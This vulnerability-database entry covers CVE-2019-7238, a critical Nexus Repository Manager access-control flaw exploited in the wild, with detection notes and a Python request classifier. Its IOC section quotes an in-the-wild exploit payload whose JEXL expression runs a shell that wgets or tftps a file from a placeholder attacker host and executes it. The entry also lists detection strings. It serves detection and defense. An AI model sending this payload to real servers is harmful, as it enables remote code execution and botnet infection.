cbcvebase.
CVE-2019-7238
published 2019-03-21

CVE-2019-7238: Sonatype Nexus Repository Manager before 3.15.0 has Incorrect Access Control.

Priority: P1 · 93 · critical · CVSS 3.1 base score 9.8
Vector: AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
Tags: KEV · ITW · EXPLOIT · Initial access
CISA Known Exploited Vulnerability (due 2022-06-10)
Exploited in the wild
EPSS: 76.53% (99.5th percentile)

Affected

1 range
Vendor: sonatype
Product: nexus_repository_manager
Version range: >= 3.0.0 < 3.15.0
Fixed in: 3.15.0

Detection & IOCs (extracted from sources)

URL: /service/extdirect
Command: {"action":"coreui_Component","method":"previewAssets","data":[{"page":1,"start":0,"limit":50,"sort":[{"property":"name","direction":"ASC"}],"filter":[{"property":"repositoryName","value":"*"},{"property":"expression","value":"233.class.forName(',27h,'java.lang.Runtime',27h,').getRuntime().exec(['flock','-w','0','/tmp/l%N','sh','-c','(wget http://%J/%T -O %N||/bin/busybox tftp -g -l %N -r %T %I)&&chmod 777 %N&&./%N a%J a%J',27h,'])"},{"property":"type","value":"jexl"}]}],"type":"rpc","tid":8}
Bytes: XOR key 0x87, cumulative byte-wise XOR string encryption
  • Exploit traffic targets POST /service/extdirect with Content-Type: application/json; payload sets action=coreui_Component, method=previewAssets, filter property=expression with type=jexl — detect this combination in HTTP request bodies to identify CVE-2019-7238 exploitation attempts.
  • The exploit payload uses JEXL expression injection via the 'expression' filter property with type 'jexl' in the previewAssets ExtDirect call; look for 'java.lang.Runtime' or 'getRuntime().exec' strings inside JSON POST bodies to /service/extdirect.
  • Hide 'N Seek botnet samples use a cumulative byte-wise XOR with key 0x87 for string obfuscation; use this decryption scheme when reverse-engineering captured samples.
  • Trend Micro Deep Security DPI rule 1009553 and TippingPoint MainlineDV filter 34706 can be used to detect/block CVE-2019-7238 exploitation traffic.
  • The exploit payload template uses format specifiers (%J, %T, %N, %I) as placeholders for attacker-controlled values (host, filename, IP, etc.); actual observed payloads will have these substituted with real infrastructure values.
  • Hard-coded P2P peer IPs and ports for this Hide 'N Seek variant are hosted externally on Palo Alto's GitHub page and are not reproduced inline in the article; consult that resource for the full peer list.
  • Exploitation requires at least one file to exist in any repository on the target NXRM 3 instance; a completely empty repository manager may not be exploitable.
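Detection logic for the first two notes above (the ExtDirect request shape and the Runtime/exec strings), as an added example that is not part of this database entry, Sonatype's code or any vendor rule. The request bodies it classifies are constructed to mirror the field layout quoted in the command IOC; the selector type used in the benign sample is an assumption, not taken from this page.

```python
import json
# Indicators taken from the detection notes above; sample bodies are constructed, not captured.
TARGET_PATH = "/service/extdirect"
SUSPECT_ACTION, SUSPECT_METHOD = "coreui_Component", "previewAssets"
RCE_MARKERS = ("java.lang.Runtime", "getRuntime().exec")

def _calls(body):
    # ExtDirect accepts a single call object or a batch (list of calls).
    items = body if isinstance(body, list) else [body]
    return [c for c in items if isinstance(c, dict)]

def _filter_props(call):
    # Flatten data[*].filter[*] into {property: value}.
    props = {}
    for param in call.get("data") or []:
        for f in (param.get("filter") or []) if isinstance(param, dict) else []:
            if isinstance(f, dict) and "property" in f:
                props[f["property"]] = f.get("value")
    return props

def classify_request(method, path, content_type, raw_body):
    """None if no match; 'jexl-expression' for a previewAssets call whose filter sets
    property=expression with type=jexl; '+rce-marker' appended when the expression
    contains a java.lang.Runtime / getRuntime().exec string."""
    if method.upper() != "POST" or path.split("?", 1)[0] != TARGET_PATH:
        return None
    if not content_type.lower().startswith("application/json"):
        return None
    try:
        body = json.loads(raw_body)
    except (TypeError, ValueError):
        return None
    for call in _calls(body):
        if call.get("action") != SUSPECT_ACTION or call.get("method") != SUSPECT_METHOD:
            continue
        props = _filter_props(call)
        if props.get("type") != "jexl" or "expression" not in props:
            continue
        expr = str(props.get("expression") or "")
        return "jexl-expression+rce-marker" if any(m in expr for m in RCE_MARKERS) else "jexl-expression"
    return None

def _body(expression, expr_type):
    # Constructed previewAssets body mirroring the field layout quoted in the command IOC above.
    return json.dumps({"action": SUSPECT_ACTION, "method": SUSPECT_METHOD, "type": "rpc", "tid": 1,
                       "data": [{"page": 1, "filter": [{"property": "repositoryName", "value": "*"},
                                                        {"property": "expression", "value": expression},
                                                        {"property": "type", "value": expr_type}]}]})
BENIGN = _body("path =~ '^/com/.*'", "csel")  # assumed benign content-selector preview (constructed)
HOSTILE = _body("''.class.forName('java.lang.Runtime').getRuntime().exec(PLACEHOLDER)", "jexl")
```

Batched ExtDirect calls (a JSON array of call objects) are handled as well, so a single hostile call hidden among benign ones in one request is still flagged.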

CVSS provenance

nvd · v3.1 · 9.8 CRITICAL · CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
nvd · v2.0 · 7.5 HIGH · AV:N/AC:L/Au:N/C:P/I:P/A:P
ghsa · 7.5 HIGH
vulncheck · 9.8 CRITICAL
cisa · 9.8 CRITICAL